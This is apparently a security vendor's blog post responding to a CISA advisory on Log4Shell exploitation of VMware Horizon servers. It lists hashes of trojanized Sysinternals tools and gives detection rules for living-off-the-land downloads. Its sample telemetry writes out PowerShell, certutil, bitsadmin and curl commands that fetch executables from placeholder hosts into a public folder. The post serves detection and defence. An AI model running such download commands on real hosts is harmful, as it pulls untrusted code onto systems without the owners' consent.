Response to US-CERT Alert (AA22-174A): Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems 

In response to US-CERT Alert AA22-174A, AttackIQ has released new malware transfer scenarios to the platform and recommends validating security controls using previously released scenarios addressing Log4Shell and the VMware CVE-2022-22954 vulnerability.

Sectors Targeted: Defense Industrial Base, Financial Services, Education, Hospitality 

On June 23, 2022, the Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) released a joint Cybersecurity Advisory (CSA) to alert defenders that state-sponsored advanced persistent threat (APT) actors continue to exploit CVE-2021-44228 (Log4Shell) in unpatched VMware Horizon and Unified Access Gateway (UAG) servers to obtain initial access.

Multiple threat actors reportedly began exploiting Log4Shell in December 2021 to deliver trojanized Sysinternals tools that loaded encrypted malware payloads on compromised systems. The report indicates that one of the victims had also been compromised through another VMware vulnerability, CVE-2022-22954, which allows remote code execution.

Trojanized Sysinternals Tools 

To assist customers with protecting their environments from these attacks, AttackIQ has released a new assessment, based on the Ingress Tool Transfer (T1105) technique, that reproduces the inbound transfer of the actor's tools and malware into the customer environment. These scenarios test customers' network and endpoint security controls designed to prevent the introduction of known malicious files to networks and devices.

This assessment covers the following trojanized samples (digests are SHA-1):

Sample Name                          SHA-1 Hash
Sysinternals Disk Usage Tool         4a3f79d6821139bc1c3f44fb32e8450ee9705237
Sysinternals PsPing Tool             33638da3a83c2688e1d20862b1de0b242a22e87c
Sysinternals LogonSessions Tool A    76f2c5f0312346caf82ed42148e78329f8d7b35a
Sysinternals LogonSessions Tool B    6a87d8df99ea58d8612fa58a58b1a3a9512f160e
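To turn the table into a check a responder can run on a suspect host, here is an added example (not AttackIQ's or CISA's code) that walks a directory tree, hashes each file in chunks, and reports any file whose SHA-1 matches one of the four digests above. The 40-character digests are SHA-1 length, which is why SHA-1 is used. The temporary files and the "constructed test sample" blocklist entry that the demo creates are constructed for illustration only; none of them is the real malware.

```python
"""Sweep a directory tree for the trojanized Sysinternals samples by SHA-1.

Added example, not AttackIQ's or CISA's code. The four digests come from the
table above (40 hex characters, so SHA-1); every file and blocklist entry the
demo creates is constructed for illustration.
"""
import hashlib
import os
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple

# SHA-1 digests from the table above, keyed lower-case for matching.
TROJANIZED_SYSINTERNALS_SHA1: Dict[str, str] = {
    "4a3f79d6821139bc1c3f44fb32e8450ee9705237": "Sysinternals Disk Usage Tool",
    "33638da3a83c2688e1d20862b1de0b242a22e87c": "Sysinternals PsPing Tool",
    "76f2c5f0312346caf82ed42148e78329f8d7b35a": "Sysinternals LogonSessions Tool A",
    "6a87d8df99ea58d8612fa58a58b1a3a9512f160e": "Sysinternals LogonSessions Tool B",
}


def sha1_of_file(path: str, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large binaries do not have to fit in memory."""
    digest = hashlib.sha1()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def sweep(root: str, blocklist: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (path, sample name) for every file under root whose SHA-1 is listed."""
    hits: List[Tuple[str, str]] = []
    for dirpath, _dirs, files in os.walk(root):
        for filename in files:
            path = os.path.join(dirpath, filename)
            try:
                digest = sha1_of_file(path).lower()
            except OSError:
                continue  # unreadable or vanished file; keep sweeping
            if digest in blocklist:
                hits.append((path, blocklist[digest]))
    return hits


def demo() -> Tuple[List[str], List[Tuple[str, str]]]:
    """Build a constructed tree and sweep it twice: once with a constructed
    blocklist that contains one planted file, once with the real table."""
    with tempfile.TemporaryDirectory() as tmp:
        planted = Path(tmp) / "du.exe"
        planted.write_bytes(b"constructed stand-in, not the real binary")
        (Path(tmp) / "sub").mkdir()
        (Path(tmp) / "sub" / "notes.txt").write_bytes(b"benign content")

        # Constructed blocklist: the planted file's own digest, labelled as such.
        constructed = {sha1_of_file(str(planted)): "constructed test sample"}
        planted_hits = [name for _path, name in sweep(tmp, constructed)]
        real_hits = sweep(tmp, TROJANIZED_SYSINTERNALS_SHA1)
    return planted_hits, real_hits


if __name__ == "__main__":
    print(demo())
```

Point `sweep()` at the directories the actor is likely to stage tools in (user profiles, the Horizon install tree, temp folders) rather than the whole disk, and treat a hit as a trigger for full triage of the host, since the loaders described in the advisory carry further encrypted payloads.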

Detection Process 

As of the alert's publication, it is unclear exactly how the threat actors carried out the ingress tool transfer. The trojanized Sysinternals tools could have reached the victim machine in two ways: directly via Log4Shell exploitation, or after exploitation, by accessing the system and transferring the tools with living-off-the-land binaries and scripts.

If the tools were transferred during exploitation itself, we recommend relying on anti-virus products to prevent and alert on these trojanized Sysinternals binaries by adding their hashes to the global blocklist. We also encourage placing VMware Horizon systems in a policy that quarantines files based on static and dynamic analysis.

If the tools were transferred using living-off-the-land binaries and scripts, the following detection details can be used in EDR/SIEM products to alert on, or prevent, the command lines shown below:

PowerShell Example:  

Process Name == (cmd.exe OR powershell.exe)
Command Line CONTAINS ((“IWR” OR “Invoke-WebRequest” OR “DownloadData”) AND “Hidden”)

Certutil Example:  

Process Name == Certutil.exe
Command Line CONTAINS (“-urlcache” AND “-f”)

Bitsadmin Example:  

Process Name == Bitsadmin.exe
Command Line CONTAINS (“/transfer” AND “http”)

Curl Example:  

Process Name == Curl.exe
Command Line CONTAINS (“http” AND “-o”)

Additionally, downloads of file transfer utilities from legitimate sites should be scrutinized to ensure the requests were made by authorized users.
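The four rule patterns above, implemented as an added example (not AttackIQ's code) so they can be run against process-creation telemetry such as Sysmon Event ID 1 or an EDR's process events. The sample events, the hosts under example.invalid, and the rule names are constructed. One design choice is worth stating: a single PowerShell command line normally uses only one download primitive, so IWR/Invoke-WebRequest and the WebClient DownloadData method are treated as alternatives rather than being required together.

```python
"""Detection rules for ingress tool transfer via living-off-the-land binaries.

Added example, not AttackIQ's or CISA's code. It applies the four rule
patterns from the text (PowerShell, certutil, bitsadmin, curl) to
process-creation events such as Sysmon Event ID 1 or EDR telemetry.
The sample events and the hosts under example.invalid are constructed.
"""
from dataclasses import dataclass
from typing import Callable, List, Set, Tuple


@dataclass(frozen=True)
class ProcessEvent:
    image: str          # Image / process path as logged by Sysmon or the EDR
    command_line: str   # full CommandLine field


def process_name(image: str) -> str:
    """Return the lower-cased file name from a logged image path."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def contains_all(text: str, *terms: str) -> bool:
    return all(term in text for term in terms)


def contains_any(text: str, *terms: str) -> bool:
    return any(term in text for term in terms)


# Each rule: (name, process names it applies to, predicate over the lower-cased
# command line). Case-insensitive substring matching mirrors the CONTAINS
# operators in the text. Assumption: IWR / Invoke-WebRequest and
# WebClient.DownloadData are alternative download primitives, so any one of
# them together with a hidden window is enough to fire.
RULES: List[Tuple[str, Set[str], Callable[[str], bool]]] = [
    ("powershell_hidden_download",
     {"cmd.exe", "powershell.exe"},
     lambda cl: contains_any(cl, "iwr", "invoke-webrequest", "downloaddata")
     and "hidden" in cl),
    ("certutil_urlcache_download",
     {"certutil.exe"},
     lambda cl: contains_all(cl, "-urlcache", "-f")),
    ("bitsadmin_transfer_download",
     {"bitsadmin.exe"},
     lambda cl: contains_all(cl, "/transfer", "http")),
    ("curl_output_to_file",
     {"curl.exe"},
     lambda cl: contains_all(cl, "http", "-o")),
]


def evaluate(events: List[ProcessEvent]) -> List[Tuple[str, str]]:
    """Return (rule name, command line) for every event that matches a rule."""
    hits: List[Tuple[str, str]] = []
    for event in events:
        name = process_name(event.image)
        command_line = event.command_line.lower()
        for rule_name, names, predicate in RULES:
            if name in names and predicate(command_line):
                hits.append((rule_name, event.command_line))
    return hits


# Constructed sample telemetry: four LOLBin downloads and two benign commands.
SAMPLE_EVENTS: List[ProcessEvent] = [
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r'powershell.exe -WindowStyle Hidden -Command "IWR http://download.example.invalid/du.exe -OutFile C:\Users\Public\du.exe"'),
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -urlcache -split -f http://download.example.invalid/psping.exe C:\Users\Public\psping.exe"),
    ProcessEvent(r"C:\Windows\System32\bitsadmin.exe",
                 r"bitsadmin.exe /transfer job1 /download /priority high http://download.example.invalid/ls.exe C:\Users\Public\ls.exe"),
    ProcessEvent(r"C:\Windows\System32\curl.exe",
                 r"curl.exe -o C:\Users\Public\ls2.exe http://download.example.invalid/ls2.exe"),
    # Benign: PowerShell with no download primitive and no hidden window.
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),
    # Benign: certutil hashing a local file, no -urlcache.
    ProcessEvent(r"C:\Windows\System32\certutil.exe",
                 r"certutil.exe -hashfile C:\Windows\notepad.exe SHA1"),
]


def demo() -> List[Tuple[str, str]]:
    return evaluate(SAMPLE_EVENTS)


if __name__ == "__main__":
    for rule, command_line in demo():
        print(f"[{rule}] {command_line}")
```

Substring terms as short as "-f" and "-o" will match unrelated switches, so in production these rules are best paired with parent-process and user context (for example, a web-server or Horizon service account spawning the downloader) before they are used for blocking rather than alerting.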

Mitigation Policies

Ensure that VMware Horizon systems are patched for Log4Shell in accordance with the VMware Security Advisories.

Additionally, it is recommended that non-administrative users be prevented from running tools such as powershell.exe, cmd.exe, and certutil.exe. This limits the abuse of these tools from end-user accounts.

Network Indicators of Compromise 

US-CERT identified multiple IP address indicators of compromise (IOCs) used by the threat actors for their command-and-control infrastructure. A new IOC Replication scenario has been released that attempts web requests directly to the IP addresses identified in both the alert and the related malware analysis reports. The infrastructure is no longer actively controlled by the threat actors, so the connections should be rejected; the scenario is still useful for validating watchlist and blocklist controls in network appliances by looking for the attempted access requests to those indicators in their logs.

Log4Shell

When Log4Shell was first discovered, AttackIQ quickly released multiple scenarios and an attack graph that emulated common post-compromise activities from threat actors exploiting that vulnerability. Our blog detailing those scenarios along with recommended defensive actions can be found here. 

CVE-2022-22954 VMware Remote Code Execution Vulnerability 

AttackIQ has also previously released both atomic and network control validation scenarios for customers to test security controls against the VMware vulnerability that allows for remote code execution. Customers can find those scenarios in the AttackIQ platform by searching for:   

  • CVE-2022-22954 VMware Workspace ONE Access Template Injection 
  • PCAP Replay – CVE-2022-22954 VMware Workspace ONE Access Template Injection 

The Adversary Research Team at AttackIQ is currently reviewing additional details about the malicious activity reported by US-CERT and will release, in the coming days, an advanced attack graph that emulates the actor's post-compromise behaviors in a broader kill chain.

In summary, AttackIQ’s new assessment will help organizations test their network and endpoint anti-virus controls against known samples used in real attacks. With data generated from continuous testing and use of this assessment, you can focus your teams on achieving key security outcomes, adjusting your security controls, and working to elevate your total security program effectiveness against a known and dangerous threat.  


AttackIQ stands at the ready to help security teams implement this assessment and other aspects of the AttackIQ Security Optimization Platform, including through our co-managed security service, AttackIQ Vanguard.